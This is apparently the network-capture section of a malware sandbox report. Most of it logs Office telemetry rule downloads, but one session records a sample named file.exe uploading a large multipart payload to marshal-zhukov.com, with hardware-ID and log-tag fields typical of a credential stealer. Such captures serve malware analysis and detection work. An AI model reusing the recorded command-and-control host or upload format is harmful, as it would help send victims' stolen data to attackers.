                                                                                                                                                                                                                                                              Content-Length: 415
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                                                                                                                                                                                                                                                              ETag: "0x8DC582BA80D96A1"
                                                                                                                                                                                                                                                              x-ms-request-id: 261fcd2e-101e-005a-5345-40882b000000
                                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                              x-azure-ref: 20241127T153145Z-174f78459684bddphC1EWRbht40000000ww000000000avxa
                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                              2024-11-27 15:31:45 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 47 67 5d 5b 4c 6c 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120651" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <SR T="2" R="([Gg][Oo][Oo][Gg][Ll][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              56192.168.2.104976613.107.246.43443
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-11-27 15:31:45 UTC192OUTGET /rules/rule120652v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                              2024-11-27 15:31:46 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Wed, 27 Nov 2024 15:31:45 GMT
                                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                                              Content-Length: 471
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                                                                                                                                                                                                                                                              ETag: "0x8DC582B97E6FCDD"
                                                                                                                                                                                                                                                              x-ms-request-id: dcf51672-d01e-005a-5c91-3f7fd9000000
                                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                              x-azure-ref: 20241127T153145Z-174f7845968n2hr8hC1EWR9cag0000000wng00000000sh33
                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                              2024-11-27 15:31:46 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120652" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              57192.168.2.104976813.107.246.43443
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-11-27 15:31:45 UTC192OUTGET /rules/rule120654v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                              2024-11-27 15:31:46 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Wed, 27 Nov 2024 15:31:46 GMT
                                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                                              Content-Length: 477
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:05 GMT
                                                                                                                                                                                                                                                              ETag: "0x8DC582BA54DCC28"
                                                                                                                                                                                                                                                              x-ms-request-id: 7af319f3-d01e-0017-6a91-3fb035000000
                                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                              x-azure-ref: 20241127T153146Z-174f7845968glpgnhC1EWR7uec0000000x7000000000mcxf
                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                              2024-11-27 15:31:46 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120654" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              58192.168.2.104976913.107.246.43443
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-11-27 15:31:47 UTC192OUTGET /rules/rule120655v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                              2024-11-27 15:31:47 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Wed, 27 Nov 2024 15:31:47 GMT
                                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                                              Content-Length: 419
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
                                                                                                                                                                                                                                                              ETag: "0x8DC582BB7F164C3"
                                                                                                                                                                                                                                                              x-ms-request-id: dd02da03-701e-001e-0d91-3ff5e6000000
                                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                              x-azure-ref: 20241127T153147Z-174f7845968n2hr8hC1EWR9cag0000000wp000000000rtex
                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                              2024-11-27 15:31:47 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 49 69 5d 5b 4d 6d 5d 5b 42 62 5d 5b 4f 6f 5d 5b 58 78 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120655" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <SR T="2" R="([Nn][Ii][Mm][Bb][Oo][Xx][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              59192.168.2.1049771172.67.160.804438100C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-11-27 15:31:47 UTC282OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=PAJIFXFL5FPGQTM
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                              Content-Length: 570820
                                                                                                                                                                                                                                                              Host: marshal-zhukov.com
                                                                                                                                                                                                                                                              2024-11-27 15:31:47 UTC15331OUTData Raw: 2d 2d 50 41 4a 49 46 58 46 4c 35 46 50 47 51 54 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 30 30 43 30 37 45 30 34 38 36 37 35 41 44 44 34 45 33 33 45 43 42 36 31 41 39 30 37 39 35 43 0d 0a 2d 2d 50 41 4a 49 46 58 46 4c 35 46 50 47 51 54 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 50 41 4a 49 46 58 46 4c 35 46 50 47 51 54 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 69 63 0d 0a 2d 2d
                                                                                                                                                                                                                                                              Data Ascii: --PAJIFXFL5FPGQTMContent-Disposition: form-data; name="hwid"700C07E048675ADD4E33ECB61A90795C--PAJIFXFL5FPGQTMContent-Disposition: form-data; name="pid"1--PAJIFXFL5FPGQTMContent-Disposition: form-data; name="lid"LOGS11--LiveTrafic--
                                                                                                                                                                                                                                                              2024-11-27 15:31:47 UTC15331OUTData Raw: 2a 16 4e 50 f8 f0 fb 64 95 29 94 50 11 ed 69 07 6a 42 bc 53 1d 93 27 40 a9 40 0e e2 c1 95 e4 9a 32 45 40 a8 f2 1b 99 63 7c 6b 7d a6 c1 bb 9b f3 8f b4 d9 49 2f 28 a3 62 6f e8 d1 5f 8c ce fb 9f 20 7a 6e a1 92 67 a7 72 9a 20 1a 76 ba 75 de 64 6e 7b 7d 6e 78 ed 57 b2 2f 0e 68 16 13 00 bb 5b ca 63 4f 1c 0a 51 18 da 27 bd 26 60 bf 1b 0a 2e 84 3e 13 cd a0 bf 31 39 f5 23 f6 a3 e0 3d eb e0 4f 5d 08 78 1f 37 94 01 85 40 ec dd 4c 86 ef 0f 1e d0 ec fb bf fd 49 ff 87 81 f9 01 df c6 7e 78 01 c0 aa b8 b6 75 3e 30 54 0c 51 b8 54 12 8a 3a c9 7a 43 72 9b 73 97 87 23 40 c8 9b fb f5 89 7a 54 c6 62 cd bf 26 b6 10 f5 80 18 e7 67 2c 9e a7 5b e7 62 41 54 c8 6a 64 ca 23 d9 cb b1 3e 63 e2 ee 2a 58 c4 a5 1d 5a 0b fc 63 41 d4 13 d3 2b cf 82 4f 1b 3b 50 cd 97 b1 92 c1 47 ce 24 b7 a5
                                                                                                                                                                                                                                                              Data Ascii: *NPd)PijBS'@@2E@c|k}I/(bo_ zngr vudn{}nxW/h[cOQ'&`.>19#=O]x7@LI~xu>0TQT:zCrs#@zTb&g,[bATjd#>c*XZcA+O;PG$
                                                                                                                                                                                                                                                              2024-11-27 15:31:47 UTC15331OUTData Raw: c7 40 e6 3e 95 5e ce a2 84 74 72 68 c0 a3 25 20 b8 82 1f 18 99 66 68 a3 1d 9e d8 a6 22 8d ca d3 9f c1 ee 32 bf 37 33 a8 24 f3 1e 5d 4a 58 05 9e e4 2e a4 8e 06 db 42 34 c3 00 ce ff b0 3f 14 b1 36 ab 05 1c 04 e8 0c f1 6f 7e 70 f1 01 42 34 43 97 13 03 c8 c3 f3 1c 7a 31 1c a2 65 48 c1 af 9a 6d 64 be 91 3a 7f 59 57 71 95 5e 67 01 12 4b 90 0b b5 4b 5a d2 d3 d0 92 47 87 4c 06 27 43 51 65 0a b8 f6 a6 37 4d 1c 89 1c 96 50 fc c3 54 0a 2e 93 4d fa fd d4 16 3b eb a1 10 8b 21 bd a3 bf f1 19 1e a8 4f 4a 20 bd 54 0d d3 e3 76 2c 2a b2 c9 dd da 98 85 76 f2 dc a4 03 eb 7e 5e 5b b8 87 8d 41 a4 03 48 5c 1c ab 7e fc e7 f9 0f 27 12 85 7a 84 bf 6e 2a 3c 06 b9 4d fc c4 c5 42 fe 14 1a 72 fd 62 37 76 4c 76 fc 53 44 a8 36 b2 4b 24 f0 28 e1 20 5c f2 b5 c6 bf 10 87 40 7c 9b 09 b2 5c
                                                                                                                                                                                                                                                              Data Ascii: @>^trh% fh"273$]JX.B4?6o~pB4Cz1eHmd:YWq^gKKZGL'CQe7MPT.M;!OJ Tv,*v~^[AH\~'zn*<MBrb7vLvSD6K$( \@|\
                                                                                                                                                                                                                                                              2024-11-27 15:31:47 UTC15331OUTData Raw: c1 6f 2d 26 e8 f0 b5 63 46 c5 6b 12 da e0 fd 24 fb fb d7 23 cc 18 8c e6 03 dc 58 55 37 d4 74 10 9b 00 fd da be 88 11 46 86 7f ad be 70 6e 81 c0 db e3 bf 25 d4 74 21 46 61 e1 00 7e 77 af 12 ff 59 7a 56 ab 49 02 e4 7e bc d7 22 22 c0 82 c4 0f 94 3d cc 55 7b 4a d7 1b e8 72 8e e1 47 6d 0b 31 fb fb 31 5a 63 0d 15 6f d1 7b 79 41 57 49 96 ad f7 a1 6b 52 a3 52 07 04 e1 62 90 5a 7a 35 e5 3b dd 20 b0 1d 41 ac e0 99 5f d1 df 2f 19 7e 47 2b cb 59 08 c4 7f 67 8f e9 e3 33 d4 44 a5 7e 73 e2 61 f7 ef a2 d8 16 b0 4e b2 e3 9d c7 2c 4f fd f9 89 c0 f1 31 45 17 de 5d 6a 37 ab 9f 80 f0 6c b4 09 f1 43 17 64 a4 75 4c 72 c0 98 17 40 15 49 51 d1 c1 09 00 f7 46 86 7a 27 66 67 40 ed 12 fb 75 30 ca 96 94 7c e8 98 c7 ba 25 44 5a 28 fa 03 34 f5 d6 55 e3 9b ef eb ee 6a 57 8a 24 c3 c9 e5
                                                                                                                                                                                                                                                              Data Ascii: o-&cFk$#XU7tFpn%t!Fa~wYzVI~""=U{JrGm11Zco{yAWIkRRbZz5; A_/~G+Yg3D~saN,O1E]j7lCduLr@IQFz'fg@u0|%DZ(4UjW$
                                                                                                                                                                                                                                                              2024-11-27 15:31:47 UTC15331OUTData Raw: 83 00 5f 5a b4 fe f7 7a 10 91 84 20 8a b9 e0 65 c3 bf 7f a8 ed d8 2b 4b a5 78 60 bb 37 ff 9f 35 f9 ff af 97 42 b8 73 94 67 1c 01 74 57 63 44 ae 20 31 e1 ef 84 dc f7 ed b9 08 5c 92 2d d9 8c d1 a9 14 57 3b 93 3e 71 70 96 24 89 a0 82 d0 a8 d0 17 87 11 44 4f 48 5d 19 a7 c8 7f 65 35 79 43 4f fb d6 97 b1 af f1 35 cd 45 a7 6f 67 09 0d e3 c0 59 aa 1d 17 30 5f 41 1e 76 f2 90 a1 aa 48 a8 06 ee c1 fb 23 85 a7 ae fb 69 00 47 cc 9f eb e3 3d 15 a8 4d b9 54 34 e8 d4 0f 37 1a eb a7 0c 7f 52 bd 87 54 aa 7d fe 4d 07 d2 96 77 40 01 1e 96 ff 82 42 b3 09 83 ed fa 3c 1f 0d 7f c3 9f ea f6 bf 8f e0 60 20 fa 5f c5 36 66 6b 3f b1 fa 9b 54 5c 6a f1 1e 7b c5 cc d2 cd 8b 92 98 24 32 94 51 81 0a 58 cf c8 bb 7a 8d f7 ed 03 63 cf d5 3d ed e6 f5 76 70 96 e9 1d 7b 96 6e 07 9a 84 85 9e 84
                                                                                                                                                                                                                                                              Data Ascii: _Zz e+Kx`75BsgtWcD 1\-W;>qp$DOH]e5yCO5EogY0_AvH#iG=MT47RT}Mw@B<` _6fk?T\j{$2QXzc=vp{n
                                                                                                                                                                                                                                                              2024-11-27 15:31:47 UTC15331OUTData Raw: b0 f1 3a 3c aa 3b 76 f4 f1 fd 5c 57 7a 3f 12 47 69 a8 0b f5 fc 16 13 0d 87 ce a6 5d e3 d1 d5 50 d6 e4 de 68 e6 a1 6a 29 69 fc a6 00 4a 23 eb 8b 82 0f 17 42 09 40 24 3f 6b 51 cf 67 32 53 09 e3 f1 fd c7 32 94 f6 07 5f bb 0b 0d 0e 54 94 6d 65 a6 84 d5 99 5b fb d1 2b ab 28 d6 cc 80 88 67 7f 91 6a e5 ec dd 55 6f 3b 4d 0c ac 02 5e 45 0a 76 9e 74 80 b7 81 a7 82 93 a5 d1 81 33 93 9d 39 b6 32 ec 11 df b9 b9 b7 39 e5 13 1f 53 b5 b1 06 e0 4c 3a f1 e2 ac a2 93 f0 01 5d ee cf bc d1 0a a1 f8 da 77 3f 43 54 43 c7 cc 59 9d 4b e6 ac 31 19 6e 95 59 fe 48 d8 ec 65 b9 e3 07 7d c3 f8 04 aa 2b a2 f7 5c 95 16 80 2a 4c 5b 1b 4e 66 2a 82 64 37 50 9c bf f7 c4 41 f0 be bf d8 05 0f ea 21 d4 6d 86 13 fb c5 0b 3e 99 08 be de c8 f5 14 79 34 fd 64 f8 d6 45 00 5e 8a d4 bf 7c ea 41 d1 54
                                                                                                                                                                                                                                                              Data Ascii: :<;v\Wz?Gi]Phj)iJ#B@$?kQg2S2_Tme[+(gjUo;M^Evt3929SL:]w?CTCYK1nYHe}+\*L[Nf*d7PA!m>y4dE^|AT
                                                                                                                                                                                                                                                              2024-11-27 15:31:47 UTC15331OUTData Raw: fe 3d 73 45 64 3f 2c c7 90 a3 ca db c1 62 c3 2a e3 f9 af 49 7e 1b 13 d2 34 85 ca 2f f9 84 21 c9 b1 9d 8c 2f f2 b3 37 6f 53 73 b7 ee 21 a3 ca f7 8d 34 8f d8 46 87 48 0b 76 e4 57 a6 6b f3 c0 ca 5c ca 04 ae 76 d5 89 b0 35 47 b9 8a 23 07 51 b4 b9 60 15 fc 27 1f 74 d9 77 b9 28 91 ad bc 11 29 d8 e8 fe ab 3a 12 d7 5f 52 c5 2d ab 7a e1 c3 5c 2b 1c 64 59 9f fa ab 2e df 00 28 59 01 6b f7 8d 11 81 53 96 e0 b7 13 07 86 98 be b3 55 73 97 fa c2 5a 8f 75 ea 81 1b f4 9a ca 24 7e 60 cf ad 7d d0 9a 2d a3 75 54 2f 70 c6 70 16 90 c6 d8 42 88 0e 3c c2 7a 12 24 0d 19 9e 93 85 5b 16 70 e0 90 ae 3b 44 fa 6d 47 ec 7a 3a 12 c3 5c 08 9f fe 4d 38 35 7c e6 27 49 83 e7 ae a6 40 d0 59 ef e6 77 07 34 cd f2 13 76 5c 5f 9b 58 9a 96 9c ff a9 23 fd 7b f6 86 c1 bb e6 f8 f4 c1 14 ef c3 57 0e
                                                                                                                                                                                                                                                              Data Ascii: =sEd?,b*I~4/!/7oSs!4FHvWk\v5G#Q`'tw():_R-z\+dY.(YkSUsZu$~`}-uT/ppB<z$[p;DmGz:\M85|'I@Yw4v\_X#{W
                                                                                                                                                                                                                                                              2024-11-27 15:31:47 UTC15331OUTData Raw: aa 26 cf ef 2f 14 ce 0f ca 83 c6 f6 c5 97 e2 95 b2 7f 2d 76 47 74 ed 48 1e d3 11 ae 2d 9c 7e a4 53 14 bc 10 6a fe 13 2b b9 7f e8 f7 b0 b3 cf da 37 1d 7b 1d 96 8c f2 0f 05 f5 b9 b3 f4 06 dc c6 cd 79 bd f7 48 48 dd 81 10 5b 91 e7 5d 43 a7 17 8f c4 45 de 18 da 31 d2 22 62 c1 8b 67 84 f1 e0 ee 9b 3a 1f 40 89 a4 59 6a 41 11 19 ca f5 32 db 0a de 2c 8c a7 86 ea 84 6c 48 e8 05 7e ec 83 60 3e c7 ac 7d 78 c2 9b 1e b9 a7 3c 38 18 8d ef 51 4f bf bd fe 4d 49 ff 0e 20 16 bb e7 b9 02 a7 47 4a fa 47 e8 15 27 01 05 86 d7 fe 32 a3 3a a3 91 a3 77 05 81 f8 c2 73 86 ab 19 28 92 47 1f 32 af f5 e1 07 5d ed d7 5e 78 3d 27 31 ba f8 10 31 77 ba 04 fa c8 0e 90 7f 13 7e 77 5c 60 6a 15 06 d2 a8 02 18 99 55 a6 ab 81 bc 05 3f db 33 d1 27 05 d0 af 47 6a a7 16 4a b4 6a 83 2f 63 01 8f 6d
                                                                                                                                                                                                                                                              Data Ascii: &/-vGtH-~Sj+7{yHH[]CE1"bg:@YjA2,lH~`>}x<8QOMI GJG'2:ws(G2]^x='11w~w\`jU?3'GjJj/cm
                                                                                                                                                                                                                                                              2024-11-27 15:31:47 UTC15331OUTData Raw: e2 82 5f ae ca 3c fe 0d 7d 0a dd c8 36 a3 d7 e9 14 16 52 e7 2f 65 c7 fb ac 97 1d 20 a9 31 15 33 a2 21 1c df 44 2a 9e 44 6d 32 7f ad 82 b6 12 4b a3 10 88 c9 88 fd 00 8d 07 59 a2 04 04 7e a8 25 2c 03 1c c1 d3 07 1e d3 1d 40 a6 44 7f 85 7e d8 af 49 8f 45 4e 21 91 3d 0d 16 c4 99 8c 49 da 4e c3 0d dc 6c 60 93 2b 75 fd 5f 93 b0 2f 26 53 b8 ce 08 a7 5d fb 1a 0d 9e a7 14 3d ef 6c b0 f5 40 3d 00 59 f1 97 f7 32 df bf 7f 3e ec 38 ac 10 95 05 93 6f 76 50 bd 33 8d ec 16 cf 19 11 52 a6 63 23 d1 31 fe 5f 68 04 89 88 9e b4 c2 73 5e 2c ed 58 af 7b 08 f1 cf 69 23 16 66 37 bb f5 cf 67 06 09 4d e5 9b 29 fc 58 6c 1e 21 16 40 4b 7b 96 ec 80 ad 1e 09 6f 01 50 22 ff ee 00 27 12 52 6f 8e bd 72 4f a6 d8 bb 7f 90 c1 8f 85 4d ae ab a8 fe 62 bd 06 23 eb 3c d4 77 be ce 64 2e d3 77 ef
                                                                                                                                                                                                                                                              Data Ascii: _<}6R/e 13!D*Dm2KY~%,@D~IEN!=INl`+u_/&S]=l@=Y2>8ovP3Rc#1_hs^,X{i#f7gM)Xl!@K{oP"'RorOMb#<wd.w
                                                                                                                                                                                                                                                              2024-11-27 15:31:47 UTC15331OUTData Raw: 55 43 e3 f0 cf e5 b1 ec a7 be 1e 46 93 83 ae fa fa 6b 9f 9c 31 5f b0 a5 ce 70 b8 58 01 d7 92 a9 76 37 1a 13 ac 1d 95 6f 5a 0b 2b d5 03 55 8d 1c 03 63 7e 4b d2 da b4 71 f9 f7 5a fb b1 9e 1f e8 b2 0d d4 da 86 a1 33 03 30 3e 21 40 f8 d7 eb 28 14 37 95 0f d9 d7 a1 99 67 4b 95 3f c1 56 be 5e 0d 68 26 f3 f1 bc ec 27 38 13 85 42 01 56 4f 19 a0 fb 45 c1 a7 79 4a 6e 52 ff 8d 1d be 15 43 e9 84 80 e5 41 54 9a 27 f0 7e f6 6f 31 5b aa 83 d9 5c 59 19 10 f0 3c 1c d0 83 46 1d ae 72 2e 02 5a 1f e6 5a b7 30 cb 9f 07 f0 70 76 13 c8 61 6c 7d 88 15 1d 1c e1 5b fa 30 fe c8 b8 27 ef 7f 0d 70 84 59 fc 47 14 d3 fd 57 fd 73 8b 11 c1 25 e4 cc d2 48 cb 04 66 c7 ce 13 53 fc 26 11 75 f8 6d e1 ba bd e5 1a a5 2d bc 09 77 eb 7c 9d 78 df 24 8a ae be a4 3b df 68 a4 07 60 80 c7 48 50 f6 8b
                                                                                                                                                                                                                                                              Data Ascii: UCFk1_pXv7oZ+Uc~KqZ30>!@(7gK?V^h&'8BVOEyJnRCAT'~o1[\Y<Fr.ZZ0pval}[0'pYGWs%HfS&um-w|x$;h`HP
                                                                                                                                                                                                                                                              2024-11-27 15:31:52 UTC1050INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Wed, 27 Nov 2024 15:31:51 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Set-Cookie: PHPSESSID=9qs268pcqgiurselflpgn9tp8h; expires=Sun, 23-Mar-2025 09:18:28 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HPf%2FVN0Kl72PgvLgITi4UffRUcPczacjd1Qd0UhiKDkxkWE4AY73Phbpz4p7nL13FUJhCc%2FGytU%2F68LW8Jv%2B%2FPLGtgCXKoS8gUEoLmCmBwX7Jx4E3ix122clSOyaJYdDvWs4RXE%3D"}],"group":"cf-nel","max_age":604800}
